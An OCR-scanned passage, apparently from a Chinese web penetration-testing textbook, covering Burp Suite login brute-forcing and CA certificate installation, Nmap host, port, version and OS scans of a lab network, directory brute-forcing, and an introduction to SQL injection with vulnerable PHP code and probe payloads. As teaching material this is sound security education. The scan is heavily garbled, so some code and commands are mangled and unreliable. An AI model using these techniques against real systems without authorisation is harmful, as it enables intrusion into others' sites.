择 使 用 状态 码 进 行 判 断 , 单 击 Status 按钮 对 数据 包 进行 排序 。 排 序 后 Status 的 值 中 只 有 
一 个 是 302。302 代表 重 定向 ,一 般 在 登录 成 功 后 ,会 从 login 页 面 重 定向 到 index 页 面 ， 
所 以 如 果 发 现 只 有 一 个 重 定向 的 状态 码 ,就 很 可 能 是 爆破 成 功 了 。 也 可 以 单 击 Length 按 
钮 对 返回 数据 包 的 长 度 进行 排序 ,发 现 只 有 一 个 数据 包 的 长 度 是 467, 就 很 可 能 是 爆破 成 
功 了 。 运 行 完 成 后 获取 用 户 名 和 密码 的 效果 如 图 1-34 所 示 。 


Save Columns 
Target | Positions | Payloads | Options 


iter. Showing all tems 


Payload1 Payload2 [Status — w|Error | Timeout | Length Comment 
admin adminkfc0907 g Q 4e 


302 

¿uu c c 7 

admin administrer2 200 [s] o so 
admin9 administrer2 200 日 8 s 
1 administrer2 200 [s] 8 4 
9 administrer2 200 8 8 «4 
admini administrer2 200 [5] 8 s 
admin89 administrer2 200 8 g se 
admin administrer3 200 [s] B so 
adming administrer3 200 日 o sw 
1 administrer3 200 日 8 4 


图 1-34 运行 完成 后 获取 用 户 名 和 密码 


(11) 用 爆破 获得 的 用 户 名 和 密码 admin: adminkfc0907 进行 登录 ,发 现 可 以 成 功 登 
录 网 站 ,如 图 1-35 所 示 。 


栏目 管理 添加 顶层 栏目 

栏目 名 称 文章 数 ”排序 操作 
栏目 管理 1 国内 新 闻 (cid: 22) 2 0 “添加 子 栏目 | 添加 文章 | 修改 | BM 
1 国际 新 闻 (cid: 23) 2 0 AFER | 添加 文章 | 修改 | Bi 


垃圾 箱 管理 


图 1-35 成 功 登录 网 站 


1.5.7 安装 CA 证 书 


目前 越 来 越 多 的 网 站 采用 SSL 加 密 方式 进行 访问 ,如 果 不 安装 CA 证 书 , 就 无 法 使 用 
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Burp Suite 对 SSL 加 密 的 网 站 进行 截 包 。 本 节 以 IE 浏览 器 为 例 , 介 绍 CA 证 书 的 安装 。 

CA 证 书 安装 步 又 如 下 : 

(1) 开启 Burp Suite, 用 浏览 器 访问 Burp Suite 的 监听 地 址 。 本 例 中 Burp Suite 的 监 
听 地 址 为 127. 0.0.1: 8088, 如 图 1-36 所 示 。 


(g) Proxy Listeners 


(e Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use on| 


L^ | —— — | mwisble | Redirect — 
NN 3x 
(seme ) t 


图 1-36 开启 Burp Suite 


(2) 访问 http: //127.0.0. 1; 8088 ,会 显示 CA 证 书 的 页 面 , 如 图 1-37 所 示 。 


B. http://127.0.0.1:8088/ D ~ © | Wi Burp Suite Professional X | 


Burp Suite Professional CA Certificate 


Welcome to Burp Suite Professional. 


图 1-37 访问 http: //127. 0.0.1; 8088 


(3) 单 击 CA Certificate 链接 ,下 载 CA 证 书 , 如 图 1-38 所 示 。 


Mj http://127.0.0.1:8088/ D ~ C | IB Burp Suite Professional X | 


Burp Suite Professional CA Certificate 


Welcome to Burp Suite Professional. 


要 打开 或 保存 来 自 127.0.0.1 的 cacert.der (973 3755)? x 
[mmo || ems | | | wo 


1-38 单 击 CA Certificate 链接 ,下 载 CA 证 书 
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(4) 选择 浏览 器 的 “工具 ”>“Internet 选项 "菜单 命令 ,如 图 1-39 所 示 。 


[x S50 EV 收藏 夫 (A) Ba nj IH 


删除 浏 览 历史 记录 (D)… Ctrl+Shift+Del 
Burp Suite Profe InPrivate 浏览 (1) Ctrl+Shift+p 
启用 跟踪 保护 (K) 


ActiveX XN) 

修复 连接 问题 (CO).… 

重新 打开 上 次 浏览 页 面 (S) 
将 站 点 添加 到 "应 用 "视图 (A) 


查看 下 载 (N) 


CA Certificate 


Welcome to Burp Suite Profes 


Windows 更 新 (U) 


性 能 仪表 板 
FI2 开发 人 员工 具 (D 
OneNote Linked Notes 
Lync Click to Call 

Send to OneNote 
添加 到 印象 笔记 5 
报告 网 站 问题 (R) 
Internet 选项 (O) 


图 1-39 ”选择 “工具 ”>“Internet 选项 ”菜单 命令 


(5) 在 “Internet 选项 ”对 话 框 中 ,选择 内容” 选项 卡 , 单 击 “ 证 书 ” 按 钮 ,如 图 1-40 
所 示 。 


Internet 选项 


Sm że 隐私 AS 连接 程序 ma 


证 书 
ra| 使 用 加 密 连 接 和 标识 的 证 书 . 


| 


自动 完成 


E 自动 完成 功能 会 存储 以 前 在 网 页 上 输入 的 
内 容 ,并 向 你 建议 匹配 项 - 


漂 和 网 页 快讯 


[f 源 和 网 页 快讯 提供 可 在 Internet 
B) Explorer 和 其 他 程序 中 读 取 的 网 站 更 新 
AS. 


图 1-40 单 击 “ 证 书 ” 按 钮 
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(6) 在 “证 书 ” 对 话 框 中 选择 “受信 任 的 根 证 书 颁发 机 构 ” 选 项 卡 , 单 击 “ 导 入 ”按钮 ,如 
图 1-41 所 示 。 


1-41 导入 证 书 


CD 单 击 “ 下 一 步 ” 按 钮 后 ,选择 已 下 载 的 Burp Suite 证 书 进行 导入 ,如 图 1-42 所 示 。 
[ Ë 证 3S 入 向 导 


指定 要 导入 的 文件 . 


文件 名 (P: 
CAUsers\walk\Downloads\cacert.der | E) 


TESI: 用 下 列 格式 可 以 在 一 个 文件 中 存储 多 个 证 蔬 : 


个 人 信息 交换 - PKCS #12 (.PFX.P12) 
加 密 消 息 语 法 标准 - PKCS #7 证 书 (.P7B) 
Microsoft 系列 证 书 存储 (:SST) 


Cm ][ wa ] 


图 1-42 选择 已 下 载 的 Burp Suite 证 书 进行 导入 


m 20 m= 
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(8) 将 证 书 存储 位 置 设置 为 “受信 任 的 根 证 书 颁发 机 构 ”, 如 图 1-43 所 示 。 


x] 


Š 证 书 导入 向 导 


证 书 存储 是 保存 证 书 的 系统 区 域 . 


Windows 可 以 自动 选择 证 书 存储 ， 你 也 可 以 为 证 书 指定 一 个 位 置 。 


O 根据 证 蔬 类 型 ,自动 选择 证 书 存储 (U 
图 格 所 有 的 证 书 部 放 入 下 列 存储 (D) 
证 书 存储 : 


[ m | 
143 设置 证 书 存储 位 置 
(9) 在 弹出 的 “安全 警告 "提示 框 中 单 击 “是 ”按钮 ,导入 证 书 , 如 图 1-44 所 示 。 
(10) 提示 导入 成 功 后 , 单 击 “ 确 定 ” 按 钮 ,如 图 1-45 所 示 。 重 启 浏览 器 ,CA 证 书 就 安 
装 完成 了 。 


| 安全 警告 


A 你 即 格 从 一 个 声称 代表 如 下 内 容 的 证 书 颁发 机 构 (CA) 安 装 证 书 : 
PortSwigger CA 
Windows 无 法 确认 证 书 是 否 确实 来 自 *PortSwigger CA"。 你 应 与 
PortSwigger CA' 联 系 ， 以 确认 证 书 来 源 。 下 列 数字 将 在 此 过 程 中 对 你 
有 帮助 : 
指纹 (sha1): 77223A77 8771A225 E0D6210B OEBOEBBE 139484CC 


警告: 


如 果 安 装 此 根 证 节 + Windows 棕 自 动 信任 所 有 此 证 书 颁发 机 构 颁 发 的 
证 书 。 安 装 未 经 指纹 确认 的 证 书 有 安全 风险 。 如 果 单 击 "是 ”, 则 表示 你 
知道 此 风险 。 

你 想 安 装 此 证 书 吗 ? 


[x] =" 


图 1-44 确认 导入 证 书 图 1-45 导入 成 功 提示 


(11) 用 下 浏览 器 访问 SSL 网 站 https: //www. baidu. com,Burp Suite 可 以 成 功 抓 
到 浏览 器 请 求 的 数据 包 , 如 图 1-46 所 示 。 


mum Web 832 2345 X m 


UU Ta Da ——a Seenee | 223 comparer [ Estender | project opriens [ 2223 erts Bypass war >a) 


Jen [metr | wetSocteis nistor | optors 


B D) Request to npadywww baidu com443 4.135.169129] 
== BERE Co) 


Parana | Headers | er 


ET / HTTP/1.1 

Accept: text/html, application/xhtml+xml, image/jxr, */* 

lAccept-Language: zh-CN 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11 0) like Gecko 
Accept-Encoding: gzip, deflate 

Host: www.baidu.com 

Connection: close 


图 1-46 Burp Suite 抓 到 SSL 数据 包 


16 ”信息 收集 


在 Web 攻防 的 过 程 中 ,信息 收集 是 非常 重要 的 一 步 , 通 过 信息 收集 可 以 了 解 攻击 目 
标的 网 络 架构 和 网 络 拓扑 ,缩小 攻击 范围 。 只 有 将 攻击 目标 的 相关 信息 收集 完整 , 才 可 以 
对 攻击 目标 开启 的 主机 及 在 其 上 运行 的 应 用 有 针对 性 地 进行 有 效 攻击 。 

信息 收集 分 为 主动 信息 收集 和 被 动 信息 收集 两 种 。 主 动 信息 收集 是 通过 主动 发 送 探 
测 数据 包 与 攻击 目标 系统 直接 交互 ,被动 信息 收集 是 指 在 不 被 察觉 的 情况 下 ,通过 搜索 引 
3E .社交 媒体 等 方式 对 攻击 目标 的 外 网 信息 进行 收集 ,例如 ,通过 搜索 引擎 收集 管理 人 员 
的 信息 ,通过 “站 长 工具 ”等 查询 网 站 的 whois 信息 、 备 案 信息 ,等 等 。 

在 有 关 主 机 存活 、 应 用 版 本 扫描 的 相关 信息 收集 工具 中 ,Nmap 是 最 常用 的 工具 。 

Nmap 是 一 款 开源 的 网 络 探测 和 安全 审核 的 工具 。 它 的 设计 目标 是 快速 地 扫描 大 型 
网 络 。Nmap 可 以 探测 网 络 中 有 哪些 主机 存活 ,这些 主机 都 提供 了 什么 服务 (应 用 程序 名 
和 版 本 ) ,这 些 服务 运行 在 什么 操作 系统 中 (包括 版 本 信息 )。Nmap 通常 用 于 安全 审核 ， 
许多 系统 管理 员 和 网 络 管理 员 也 用 它 来 做 一 些 日 常 的 工作 ,例如 ,查看 整个 网 络 的 信息 ， 
管理 服务 升级 计划 ,以 及 监视 主机 和 服务 的 运行 。 

Nmap 可 以 检测 目标 主机 是 否 在 线 、 端 口 开 放 情 况 .运行 的 服务 类 型 及 版 本 、 操 作 系 
统 与 设备 类 型 等 信息 。 它 是 网 络 管理 员 必 用 的 软件 之 一 ,主要 用 于 评估 网 络 系统 安全 。 

Nmap 通常 用 在 信息 搜集 阶段 ,主要 用 于 搜集 目标 主机 的 基本 状态 信息 。 扫 描 结 果 
可 以 作为 漏洞 扫描 、 漏 洞 利用 和 权限 提升 阶段 的 输入 。 


1.6.1 Nmap 扫描 


1. Nmap 的 功能 
Nmap 的 功能 主要 有 以 下 4 项 : 
CD. 主机 存活 检测 。 
(2) 端口 探测 。 
(3) 服务 识别 。 
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(4) 操作 系统 识别 。 


2. Nmap 扫描 方式 

Nmap 支持 的 扫描 方式 如 下 : 

-sS/sT/sA/sW/sM TCP SYN ffi . TCP connect O HH. ACK 扫描 、 
TCP 窗口 扫描 和 TCP Maimon 扫描 。 

-sU UDP 扫描 。 

-sN/sF/sX TCP Null 3438 FIN 扫描 和 Xmas 扫描 。 

一 Scanflags 自 定义 TCP 包 中 的 flags。 

-sI zombie host[ : probeport ] 通过 指定 的 僵尸 主机 发 送 扫描 数据 包 。 

-sY/sZ SCTP INIT 扫描 和 COOKIE-ECHO 扫描 。 

-sO 使 用 IP 扫描 确定 目标 机 支持 的 协议 类 型 。 

-b "FTP relay host" 使 用 FTP bounce 扫描 。 


Nmap 支持 多 种 形式 的 扫描 方式 。 其 中 ,sS 称 为 半 开 扫描 ,因为 sS 扫描 并 不 需要 完 
成 三 次 握手 ,发送 syn 包 后 ,对 端 返回 syn 十 ack 包 , 就 认为 对 端 是 存活 的 ,结束 本 次 连接 ， 
不 会 再 返回 ack 包 。 半 开 扫 描 最 大 的 好 处 是 很 少 有 系统 将 其 记 人 系统 日 志 , 有 隐蔽 性 。 
Nmap 半 开 扫描 使 用 示例 如 下 : 


root@kali:~#nmap -sS -p 80 192.168.91.142 

Nmap scan report for 192.168.91.142 

Host is up (0.00027s latency). 

PORT STATE SERVICE 

80/tcp open http 

MAC Address: 00:0C:29:D6:A7:12 (VMware) 

Nmap done: 1 IP address (1 host up) scanned in 0.07 seconds 


通过 nmap -sS -p 80 192. 168. 91. 142 对 192. 168. 91. 142 地 址 的 80 端口 进行 半 开 扫 
描 , 发 现 该 IP 地 址 的 80 端口 开放 。 


3. 主机 存活 发 现 

Nmap 在 进行 主机 存活 发 现时 可 以 使 用 以 下 参数 : 

-sL 仅仅 显示 扫描 的 IP 地 址 数目 ,不 会 进行 任何 扫描 。 

-sn ping 扫描 , 即 主机 发 现 。 

-Pn 不 检测 主机 存活 。 

-PS/PA/PU/PY[portlist] 使 用 TCP SYN ping, TCP ACK ping, UDP ping 
发 现 主机 。 

-PE/PP/PM 使 用 ICMP 信息 请 求 . 时 间 戳 请求 和 地 址 掩 码 请 求 
包 发 现 主机 。 

-POLprotocol list] 使 用 IP 协议 包 探测 对 方 主机 是 否 开启 。 

-n/-R 不 对 IP 地 址 进行 域名 反 向 解析 以 及 对 所 有 的 IP 
地 址 都 进行 域名 的 反 向 解析 。 
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主机 存活 发 现 示 例如 下 : 


root@kali:~#nmap -sn 192.168.91.0/24 
Nmap scan report for 192.168.91.1 

Host is up (0.00022s latency). 

MAC Address: 00:50:56:C0:00:08 (VMware) 
Nmap scan report for 192.168.91.2 

Host is up (0.00077s latency). 

MAC Address: 00:50:56:E2:31:47 (VMware) 
Nmap scan report for 192.168.91.142 
Host is up (0.00019s latency). 

MAC Address: 00:0C:29:D6:A7:12 (VMware) 
Nmap scan report for 192.168.91.254 
Host is up (0.000070s latency). 

MAC Address: 00:50:56:EB:54:F2 (VMware) 
Nmap scan report for 192.168.91.135 
Host is up. 

Nmap done: 256 IP addresses (5 hosts up) scanned in 2.00 seconds 


通过 nmap -sn 192. 168. 91. 0/24 扫描 192. 168. 91 这 个 网 段 的 C 段 ,Host is up 表示 
主机 存活 ,发现 192. 168. 91. 1,192. 168. 91. 2 和 192. 168. 91. 142 等 多 个 主机 存活 。 

Pn 这 个 参数 在 实际 工作 中 使 用 得 比较 多 , 主要 用 于 有 防火 墙 开 启 的 情况 。 加 上 这 个 
参数 后 ,不 会 通过 ICMP 等 协议 进行 主机 存活 判断 ,而 直接 对 端口 进行 扫描 。 这 样 ,在 目 
标 主 机 开启 了 防火 墙 ,禁止 ping 的 情况 下 ,也 可 以 利用 这 个 参数 正常 扫描 目标 主机 是 否 
存活 及 其 对 外 开启 的 相关 服务 。 


4. 主机 端口 发 现 

Nmap 在 进行 主机 端口 发 现时 可 以 使 用 以 下 参数 : 

-P 特定 的 端口 (如 -p 80,443) 或 者 所 有 端口 (如 -p 1-65535) 。 
-p U: PORT 扫描 UDP 的 某 个 端口 ,如 -p U: 53。 

快速 扫描 模式 , 比 默认 的 扫描 端口 还 少 。 

4 不 随机 扫描 端口 ,默认 是 随机 扫描 。 


—top-ports "number" 扫描 开放 概率 最 高 的 number 个 端口 。 开 放 概 率 需 要 参 
考 nmap-services 文件 。 在 Ubuntu 中 ,该 文件 位 于 /usr/ 
share/nmap. nmap。 默 认 扫描 前 1000 个 。 

主机 端口 发 现 示 例如 下 : 


root@kali:~#nmap -p 1-65535 192.168.91.142 
Nmap scan report for 192.168.91.142 

Host is up (0.00084s latency). 

Not shown: 65531 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

80/tcp open http 
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2004/tcp open mailbox 
13309/tcp open unknown 
MAC Address: 00:0C:29:D6:A7:12 (VMware) 


通过 nmap -p 1-65535 192. 168. 91. 142 对 192. 168. 91. 142 地 址 的 1~ 65535 端口 
( 即 所 有 端口 ) 进 行 扫描 ,发 现 开启 了 22、80 等 端口 。Web 攻防 中 应 用 的 端口 很 可 能 不 是 
默认 端口 ,所 以 对 所 有 端口 进行 扫描 很 有 必要 ,但 是 耗费 时 间 较 长 。 


5. 服务 版 本 识别 

Nmap 在 进行 服务 版 本 识别 时 可 以 使 用 以 下 参数 : 

-sV 开放 版 本 检测 ,可 以 使 用 -A 同时 打开 操作 系统 检测 和 版 
本 检测 。 

一 version-intensity "level" 设置 版 本 扫描 强度 ,level 指定 使 用 哪些 检测 报 文 。 数 值 
越 高 ,服务 越 有 可 能 被 正确 识别 。 默 认 是 7。 


—version-light 打开 轻 量 级 模式 ,为 --version-intensity 2 的 别名 。 
—version-all 尝试 所 有 检测 ,为 -version-intensity 9 的 别名 。 
—version-trace 显示 详细 的 版 本 检测 过 程 信息 。 

服务 版 本 识别 示例 如 下 : 


root@kali:~#nmap -sV 192.168.91.142 
Nmap scan report for 192.168.91.142 
Host is up (0.00097s latency). 

Not shown: 997 closed ports 


PORT STATE SERVICE VERSION 

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) 
80/tcp open http Apache httpd 2.2.15 ((CentOS)) 

2004/tcp open ssh OpenSSH 5.3 (protocol 2.0) 


MAC Address: 00:0C:29:D6:A7:12 (VMware) 
Service Info: OS: Linux; CPE: cpe:/o:Linux:Linux kernel 


Service detection performed. Please report any incorrect results at https:// 
nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 6.73 seconds 


通过 nmap -sV 192. 168. 91. 142 对 192. 168. 91. 142 的 服务 版 本 进行 扫描 ,发 现 了 
Apache httpd 2. 2. 15((CentOS) ) 等 详细 的 版 本 信息 。 


6. 操作 系统 识别 
Nmap 在 进行 操作 系统 识别 时 可 以 使 用 以 下 参数 : 


-O 启用 操作 系统 检测 ,可 以 使 用 -A 同时 启用 操作 系统 检测 
和 版 本 检测 。 
—osscan-limit 针对 指定 的 目标 进行 操作 系统 检测 (至 少 需 确 知 该 主机 


分 别 有 一 个 open 和 closed 的 端口 ) 。 
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—osscan-guess 推测 操作 系统 检测 结果 。 当 Nmap 无 法 确定 目标 的 操作 
系统 时 ,会 尽 可 能 地 提供 最 相近 的 匹配 ,Nmap 默认 进行 
这 种 匹配 。 

操作 系统 识别 示例 如 下 : 


root@kali:~#nmap -O 192.168.91.142 
Nmap scan report for 192.168.91.142 
Host is up (0.00086s latency). 

Not shown: 997 closed ports 

PORT STATE SERVICE 

22/tcp open ssh 

80/tcp open http 

2004/tcp open mailbox 

MAC Address: 00:0C:29:D6:A7:12 (VMware) 
Device type: general purpose 

Running: Linux 3.X|4.X 

OS CPE: cpe:/o:Linux:Linux kernel:3 cpe:/o:Linux:Linux kernel:4 
OS details: Linux 3.2 -4.6 

Network Distance: 1 hop 


OS detection performed. Please report any incorrect results at https://nmap. 


org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 1.89 seconds 


通过 nmap -O 192.168. 91. 142 对 192. 168. 91. 142 的 操作 系统 进行 扫描 ,发 现 了 操 


作 系 统 相 关 的 详细 信息 (OS CPE:cpe:/o:Linux:Linux_kernel:3 cpe:/o:Linux: Linux | 


kernel:4) 。 

7. Nmap 输出 结果 

Nmap 可 以 使 用 以 下 参数 设置 输出 结果 : 

-oN 将 标准 输出 直接 写 人 指定 的 文件 。 

-oX 输出 XML 文件 。 

-oS 将 所 有 的 输出 都 改 为 大 写 。 

-oG 输出 便于 通过 bash 或 者 Perl 处 理 的 格式 ,而 非 XML 
文件 。 

-oA BASENAME 将 扫描 结果 以 标准 格式 .XML 格式 和 Grep 格式 一 次 
性 输出 。 

-v 提高 输出 信息 的 详细 度 。 

-d level 设置 debug 级 别 ,最 高 是 9。 

—reason 显示 端口 处 于 特定 状态 的 原因 。 

一 open 只 输出 端口 状态 为 open 的 端口 。 

—packet-trace 显示 所 有 发 送 或 者 接收 到 的 数据 包 。 

一 iflist 显示 路 由 信息 和 接口 ,以 便于 调试 。 
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—log-errors 输出 日 志 等 级 为 errors 和 warnings 的 日 志 。 
—append-output 追加 到 指定 的 文件 。 

一 resume FILENAME 恢复 已 停止 的 扫描 。 

—stylesheet PATH/URL 将 XML 输出 转换 为 HTML 的 XSL 样式 表 。 
一 Webxml 从 nmap. org 得 到 XML 的 样式 。 

一 no-stylesheet 忽略 XML 声明 的 XSL 样式 表 。 


例如 ,可 以 通过 nmap -O 192. 168. 91. 142 -oX test. xml 将 扫描 结果 输出 到 test. xml 
文件 中 。 


1.6.2 敏感 目录 扫描 


在 Web 攻防 的 过 程 中 ,对 目标 网 站 的 网 站 结构 进行 探测 和 对 网 站 存在 的 敏感 目录 文 
件 进 行 探 测 是 非常 重要 的 一 步 , 通 过 目录 扫描 ,可 以 获取 网 站 的 上 传 页 面 . 后 台 管 理 页 面 、 
其 他 敏感 目录 、 网 站 备份 源码 ,数据 库 文件 等 。 

目录 扫描 主要 使 用 工具 进行 探测 ,比较 常用 的 工具 有 御 剑 、Burp Suite、wwwscan 等 ， 
扫描 效果 主要 取决 于 使 用 的 字典 , 当然 与 工具 也 有 一 定 关系 ,例如 ,有 的 网 站 会 判断 头 信 
息 , 这 样 ,使 用 Burp Suite 等 可 以 自 定义 HTTP 头 的 工具 会 使 扫描 结果 更 准确 。 

本 节 介 绍 使 用 Burp Suite 扫描 目录 的 方法 。 

Burp Suite 有 Intruder 模块 ,可 以 将 抓 到 的 数据 包 的 路 径 设置 为 变量 ,然后 将 目录 文 
件 的 字典 添加 为 payload ,最 后 不 断 遍 历 字 典 中 的 路 径 , 达 到 目录 爆破 的 目的 。 

CD 将 抓 到 的 数据 包 的 路 径 设置 为 变量 ,如 图 1-47 所 示 。 


(2j Payload Positions 


Configure the positions where payloads will be inserted into the base request. The attack type determines the way in which payloads are assigned 
payload positions - see help for full details. 


Attack type: [Sniper i) 
GET /IBNBSEN HITP/1.1 a l 
Host: 192. 168. 91. 142 

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 

Accept: text/html, application/xhtml-xml, application/xml;q-0. 9, */*; q=0. 8 

Accept-Language: zh-CN, zh; q=0. 8, en-US; q=0. 5, en; q=0. 3 


Accept-Encoding: gzip, deflate 
Connection: keep-alive I! 
Upgrade-Insecure-Requests: 1 


图 1-47 将 路 径 设置 为 变量 


(2) 将 目录 文件 的 字典 添加 为 payload。 注 意 ,要 取消 选中 最 下 面 的 Payload 
Encoding 选项 组 中 的 复 选 框 ,否则 可 能 会 对 payload 中 的 /" 等 特殊 字符 进行 URL 编码 。 
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payload 参数 设置 如 图 1-48 所 示 。 


Target | Positions Options 


You can define rules to perform various processing tasks on each payload before it is used. 


[Add | [Enabled |Rule 


图 Payload Encoding 


This setting can be used to URL-encode selected characters within the final payload, for safe 
transmission within HTTP requests. 


图 1-8 payload 参数 设置 


(3) 单 击 Start attack 按钮 ,遍历 完成 字典 中 的 路 径 。 然 后 ,对 状态 码 进行 排序 ,状态 
码 为 200 和 301 的 路 径 都 是 真实 存在 的 路 径 , 如 图 1-49 所 示 。 


Jeaan [Sus a| Eror [Timeout] tengih 
19 header php 200 g Lj 2026 
20 footer php 200 g B s» 
1 sqi 301 g B s 
lz xss 301 国 国 540 
3 xxe 301 国 国 540 
lo 404 g B 4e 

csrf 404 g B 462 
5 /blog/admin php 404 g B 42 
le lask/admin.php 404 国 B 4 
ú fadd php 404 g E 465 


图 1-49. 状态 码 为 200 和 301 说 明 路 径 真实 存在 


012 思考 题 


. 简 述 HTTP 的 请 求 /响应 模型 。 

. HTTP 常见 的 状态 码 有 哪些 ? 分 别 代表 什么 ? 

. HTTP 常见 的 请 求 方法 有 哪些 ? 

. HTTP 常见 的 请 求 头 有 哪些 ? 分 别 代表 什么 ? 

. HTTP 常见 的 响应 头 有 哪些 ? 分 别 代表 什么 ? 

. Session 有 几 种 传输 方式 ? 

. Burp Suite 主要 的 组 件 有 哪些 ? 分 别 有 什 么 功能 ? 


DWN 
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8. Nmap 的 主要 功能 有 哪些 ? 
9. Nmap 的 扫描 方式 有 哪些 ? 
10. Nmap 主机 存活 发 现 的 命令 是 什么 ? 
11. Nmap 端口 识别 发 现 的 命令 是 什么 ? 
12. Nmap 版 本 识别 发 现 的 命令 是 什么 ? 
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SQL 注入 漏洞 


2.1 SQL 注入 漏洞 简介 


2.1.1 SQL 注入 漏洞 产生 原因 及 危害 


SQL 注入 漏洞 是 指 攻 击 者 通过 浏览 器 或 者 其 他 客户 端 将 恶意 SQL 语句 插入 到 网 站 
参数 中 ,而 网 站 应 用 程序 未 对 其 进行 过 滤 , 将 恶意 SQL 语句 带 入 数据 库 使 恶意 SQL 语句 
得 以 执行 ,从 而 使 攻击 者 通过 数据 库 获取 敏感 信息 或 者 执行 其 他 恶意 操作 。 

SQL 注入 漏洞 可 能 会 造成 服务 器 的 数据 库 信息 汇 露 、 数 据 被 窃取 、 网 页 被 自 改 ,甚至 
可 能 会 造成 网 站 被 挂 马 、 服 务 器 被 远程 控制 ,被 安装 后 门 等 。 


2.1.2 SQL 注入 漏洞 示例 代码 分 析 
以 下 是 SQL 注入 漏洞 的 示例 代码 : 


$id=$ GET['id']; 

$sql-"SELECT * FROM users WHERE id=$id LIMIT 0,1"; 
$result-mysql query($sq1); 
$row-mysql fetch array($result); 


中 间 件 通过 $  GET['id'] 4k BUB P d$ A BJ id 参数 的 值 ,并 赋值 给 $id 这 个 变量 。 
$ id 在 后 面 没有 经 过 任何 过 滤 ,直接 拼接 到 SQL 语句 中 ,然后 在 数据 库 中 执行 了 此 SQL 
语句 。 

如 果 用 户 提交 index. php?id—1 and 1— 1.34 Ja ii Bg SQL 语句 就 变 为 SELECT * 
FROM users WHERE id=1 and 1—1 LIMIT 0,1 ,会 有 正常 的 结果 返回 。 

如 果 用 户 提交 index. php?id—1 and 1 二 2, 那 么 后 面 的 SQL 语句 就 变 为 SELECT * 
FROM users WHERE id=1 and 1—2 LIMIT 0,1, 会 有 不 正常 的 结果 返回 。 


213 SQL 注入 分 类 


SQL 注入 按照 数据 类 型 分 为 数字 型 注入 和 字符 型 注入 。 注 入 点 的 数据 类 型 为 数字 
型 时 为 数字 型 注入 ,注入 点 的 数据 类 型 为 字符 型 时 为 字符 型 注入 。 

SQL 注入 按照 服务 器 返回 信息 是 否 显示 分 为 报错 注入 和 盲 注 。 如 果 在 注入 的 过 程 
中 ,程序 将 获取 的 信息 或 者 报错 信息 直接 显示 在 页 面 中 ,这 样 的 注入 为 报错 注入 ;如 果 在 
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注入 的 过 程 中 ,程序 不 显示 任何 SQL 报错 信息 ,只 能 通过 精心 构造 SQL 语句 ,根据 页 面 
是 否 正常 返回 或 者 返回 的 时 间 判 断 注入 的 结果 ,这 样 的 注入 为 盲 注 。 


22 数字 型 注入 


数字 型 注入 就 是 注入 点 的 数据 类 型 是 数字 型 ,没有 用 单 引 号 引起 来 。 数 字 型 注入 的 
典型 示例 代码 如 下 : 


$id=$ GET['id']; 

$sql-"SELECT * FROM users WHERE id=$id LIMIT 0,1"; 
$result-mysql query($sql); 
$row-mysql fetch array($result); 


在 WHERE id= $ id 这 个 SQL 语句 的 子 句 中 , $ id 变量 没有 用 单 引号 或 者 双 引 号 
引起 来 ,而 是 直接 拼接 到 了 后 面 ,这 样 的 注入 就 是 典型 的 数字 型 注入 。 

判断 数字 型 注入 的 方法 如 下 : 

(1) 输入 单 引 号 ,不 正常 返回 。 

如 果 用 户 提交 index. php?id —1'. JE Z Jš ii BJ SQL 语句 就 变 为 SELECT * FROM 
users WHERE id—1' LIMIT 0,1,SQL 语句 本 身 存在 语法 错误 ,会 有 不 正常 的 结果 返回 。 

(2) 输入 and 1 王 1 ,正常 返回 。 

如 果 用 户 提交 index. php?id—1 and 1 一 1, 那 么 后 面 的 SQL 语句 就 变 为 SELECT * 
FROM users WHERE id=1 and 1—1 LIMIT 0,1, 会 有 正常 的 结果 返回 。 

(3) 输入 and 1—2 ,不 正常 返回 。 

如 果 用 户 提交 index. php?id—1 and 1 王 2, 那 么 后 面 的 SQL 语句 就 变 为 SELECT x 
FROM users WHERE id—1 and 1—2 LIMIT 0,1, 会 有 不 正常 的 结果 返回 。 

数字 型 注入 的 注入 点 主要 通过 上 面 3 个 语句 来 判断 ,如 果 输 入 的 返回 结果 与 上 面相 
符 , 说 明 测 试 语句 中 的 恶意 SQL 语句 被 带 入 数据 库 中 并 且 成 功 执行 ,那么 就 可 能 存在 数 
字 型 注入 。 具 体 有 没有 数字 型 注入 ,是 否 可 以 通过 数字 型 注入 获取 有 效 信 息 ,还 需要 大 量 
的 测试 来 验证 。 


2.3 字符 型 注入 


字符 型 注入 就 是 注入 点 的 数据 类 型 是 字符 型 。 字 符 型 注入 与 数字 型 注入 的 区 别 就 是 
字符 型 注入 要 用 一 对 单 引 号 引起 来 。 字 符 型 注入 的 典型 示例 代码 如 下 : 


$id=$ GET['id']; 

$sql-"SELECT * FROM users WHERE id-'$id' LIMIT 0,1"; 
$result-mysql query ($sql); 

$row-mysql fetch array ($result); 
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这 个 示例 代码 与 数字 型 注入 的 示例 代码 基本 一 致 ,只 是 在 后 面 的 SQL 语句 拼接 中 ， 
$id 多 了 一 对 单 引 号 , Sid 是 字符 型 数据 ,这 就 是 典型 的 字符 型 注入 。 

判断 字符 型 注入 的 方法 如 下 : 

(1) 输入 单 引号 ,不 正常 返回 。 

如 果 用 户 提交 index. php?id 王 1'", 那 么 后 面 的 SQL 语句 就 变 为 SELECT * FROM 
users WHERE id—1' LIMIT 0,1,SQL 语句 本 身 存在 语法 错误 ,会 有 不 正常 的 结果 返回 。 

(2) 输入 ' and 1' 二 1 ,正常 返回 。 

如 果 用 户 提交 index. php?id— 1' and 11' 二 1 ,那么 后 面 的 SQL 语句 就 变 为 SELECT * 
FROM users WHERE id='1' and '1'='1' LIMIT 0,1, 会 有 正常 的 结果 返回 。 

(3) 输入 ' and 1' 二 2, 不 正常 返回 。 

如 果 用 户 提 交 index. php?id— 1' and 1' 一 '2 ,那么 后 面 的 SQL 语句 就 变 为 SELECT * 
FROM users WHERE id='1' and '1'—?' LIMIT 0,1, 会 有 不 正常 的 结果 返回 。 

字符 型 注入 的 注入 点 主要 通过 上 面 3 个 语句 来 判断 ,如 果 输 入 的 返回 结果 与 上 面相 
符 , 说 明 测试 语句 中 的 恶意 SQL 语句 被 带 入 数据 库 中 并 且 成 功 执行 ,那么 就 可 能 存在 字 
